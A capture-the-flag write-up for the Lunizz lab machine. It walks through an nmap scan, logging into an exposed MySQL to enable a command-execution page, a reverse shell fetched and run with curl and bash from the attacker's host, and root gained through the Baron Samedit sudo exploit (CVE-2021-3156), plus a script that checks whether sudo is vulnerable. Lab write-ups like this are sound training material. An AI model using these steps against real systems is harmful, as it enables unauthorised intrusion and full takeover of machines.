Link to the ctf: Lunizz CTF
# Nmap 7.80 scan initiated Wed Feb 24 23:41:07 2021 as: nmap -sV -sC -p- -T4 -oN nmap.log 10.10.115.79
Nmap scan report for 10.10.115.79
Host is up (0.087s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f8:08:db:be:ed:80:d1:ef:a4:b0:a9:e8:2d:e2:dc:ee (RSA)
|   256 79:01:d6:df:8b:0a:6e:ad:b7:d8:59:9a:94:0a:09:7a (ECDSA)
|_  256 b1:a9:ef:bb:7e:5b:01:cd:4c:8e:6b:bf:56:5d:a7:f4 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open  mysql   MySQL 5.7.32-0ubuntu0.18.04.1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.32-0ubuntu0.18.04.1
|   Thread ID: 3
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, ConnectWithDatabase, FoundRows, IgnoreSigpipes, SupportsTransactions, LongPassword, ODBCClient, SwitchToSSLAfterHandshake, InteractiveClient, LongColumnFlag, SupportsCompression, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: `|lXPJ\x1CK5G";6\x10y | Nq@Z
|_  Auth Plugin Name: mysql_native_password
4444/tcp open  krb524?
| fingerprint-strings:
|   GetRequest:
|     Can you decode this for me?
|     bGV0bWVpbg==
|     Wrong Password
|   NULL, SSLSessionReq:
|     Can you decode this for me?
|_    bGV0bWVpbg==
5000/tcp open  upnp?
| fingerprint-strings:
|   NULL:
|     OpenSSH 5.1
|_    Unable to load config info from /usr/local/ssl/openssl.cnf
Running dirsearch against the webserver with the wordlist SecLists/Discovery/Web-Content/raft-large-files.txt, we found a file with the following content:
Made By CTF_SCRIPTS_CAVE (not real)
Thanks for installing our ctf script
#Steps
- Create a mysql user ([REDACTED]:[REDACTED])
- Change necessary lines of config.php file
Done you can start using ctf script
#Notes
please do not use default creds (IT'S DANGEROUS) <<<<<<<<<---------------------------- READ THIS LINE PLEASE
On the webserver we also found /whatever/index.php (again with dirsearch, this time using the wordlist SecLists/Discovery/Web-Content/raft-large-directories.txt). It has an input field that could potentially execute commands, but it doesn't work right now: the page shows Command Executer Mode :0, which suggests that the function is disabled.
We can connect to MySQL (port 3306 is reachable from the network, as the nmap scan showed) using the credentials listed in that file:
mysql -u USERNAME -pPASSWORD -h VICTIM_IP
In the MySQL service there is a database called runornot, containing a table called runcheck with a single column, run, holding a single row (its value is the 0 that /whatever/index.php shows as Command Executer Mode).
After selecting the runornot database, I changed the value of that row:
UPDATE runcheck SET run=1;
Remote Code Execution
I went back to /whatever/index.php and saw that Command Executer Mode now shows the value we wrote instead of 0. So I tried the input again, and we got RCE.
I then used asio to generate a reverse shell one-liner:
asio -H MY_IP -P 8080 -A -B
I created a file called shell.sh and put the one-liner from asio in it.
I opened a listener for the reverse shell:
rlwrap nc -vlp 8080
and then served the script with python3 -m http.server (it listens on port 8000 by default).
NOTE: the http.server command MUST run inside the same folder as shell.sh, otherwise the download below returns a 404.
Through the command executer, download the script onto the target machine (curl's -o needs a file path, not a directory):
$(curl YOUR_IP:8000/shell.sh -o /tmp/shell.sh)
and then execute it the same way:
$(bash /tmp/shell.sh)
Sudo is vulnerable to CVE-2021-3156 (Baron Samedit); this is the unintended way I found to get root.
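Before pulling an exploit onto a box it is worth confirming that sudo is actually exploitable, because the version number alone can mislead. The script below is an added example and is not part of the writeup or of the exploit repo used later: it classifies the string printed by sudo --version against the affected upstream ranges (legacy 1.8.2 through 1.8.31p2, stable 1.9.0 through 1.9.5p1, fixed in 1.9.5p2) and then runs the behavioural test from the public advisory, sudoedit -s /, which is the check that actually matters on distribution builds that backport the fix without bumping the version (a patched Ubuntu 18.04 still reports 1.8.21p2). Function names, the --live flag and the sample version strings are my own choices.

```shell
#!/bin/sh
# Added example (not code from the writeup): is this sudo affected by
# CVE-2021-3156, the heap overflow in sudoedit's argument handling?
#
# Affected upstream versions: 1.8.2 .. 1.8.31p2 and 1.9.0 .. 1.9.5p1.
# Caveat: distros backport the fix without changing the upstream version, so
# the version test can only say "possibly affected"; the sudoedit test decides.

# Turn "Sudo version 1.8.21p2" (first line of `sudo --version`) or a bare
# "1.8.21p2" into one integer, MAJOR*1000000 + MINOR*10000 + PATCH*100 + P,
# so that ranges can be compared with plain arithmetic. A missing pN is p0.
sudo_version_number() {
    v=${1#"Sudo version "}
    base=${v%%p*}                       # 1.8.21
    p=${v#"$base"}; p=${p#p}            # 2, or empty when there is no pN suffix
    maj=${base%%.*}
    rest=${base#*.}
    min=${rest%%.*}
    pat=${rest#*.}
    [ "$pat" = "$rest" ] && pat=0       # "1.9" has no third component
    echo $(( maj * 1000000 + min * 10000 + pat * 100 + ${p:-0} ))
}

# Exit status 0 when the version string lies inside an affected range.
cve_2021_3156_version_affected() {
    n=$(sudo_version_number "$1")
    # 1.8.2 .. 1.8.31p2
    { [ "$n" -ge 1080200 ] && [ "$n" -le 1083102 ]; } ||
    # 1.9.0 .. 1.9.5p1
    { [ "$n" -ge 1090000 ] && [ "$n" -le 1090501 ]; }
}

# The advisory's runtime test, to be run as an unprivileged user: a vulnerable
# sudo accepts the bogus -s flag for sudoedit and complains about the file
# ("sudoedit: /: not a regular file"); a fixed sudo rejects the flag and prints
# a "usage:" line instead. Returns 0 vulnerable, 1 patched, 2 inconclusive.
cve_2021_3156_sudoedit_test() {
    command -v sudoedit >/dev/null 2>&1 || { echo "sudoedit not found"; return 2; }
    out=$(sudoedit -s / 2>&1)
    case "$out" in
        sudoedit:*"not a regular file"*) echo "VULNERABLE: $out";   return 0 ;;
        usage:*)                         echo "patched: $out";      return 1 ;;
        *)                               echo "inconclusive: $out"; return 2 ;;
    esac
}

# Usage on the target: sh cve-2021-3156-check.sh --live
if [ "${1:-}" = "--live" ]; then
    ver=$(sudo --version 2>/dev/null | head -n 1)
    if cve_2021_3156_version_affected "$ver"; then
        echo "$ver: inside the affected range, confirming with sudoedit..."
    else
        echo "$ver: outside the affected range, confirming anyway (vendor builds vary)..."
    fi
    cve_2021_3156_sudoedit_test
fi
```

Run it with --live from the reverse shell (as the low-privileged user you landed as, not root); a "VULNERABLE" line means the box is worth the exploit build below, while "patched" means the version number was lying and the hour is better spent elsewhere.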
I first cloned the CVE-2021-3156 exploit repo (the one that builds sudo-hax-me-a-sandwich from hax.c and lib.c) on my machine, inside the folder the Python webserver is still serving.
In the reverse shell I created /tmp/privesc, downloaded the necessary files from the Python webserver, ran make (this needs make and gcc on the target) and then executed the binary:
mkdir /tmp/privesc
cd /tmp/privesc
wget YOUR_IP:8000/CVE-2021-3156/Makefile
wget YOUR_IP:8000/CVE-2021-3156/hax.c
wget YOUR_IP:8000/CVE-2021-3156/lib.c
make
./sudo-hax-me-a-sandwich
Run without an argument, the binary lists the targets it supports, which tells us which argument we can supply to it.
The target machine runs Ubuntu 18.04.5 LTS (Bionic Beaver), so according to the list printed by sudo-hax-me-a-sandwich we have to supply the argument for that target, and we got root.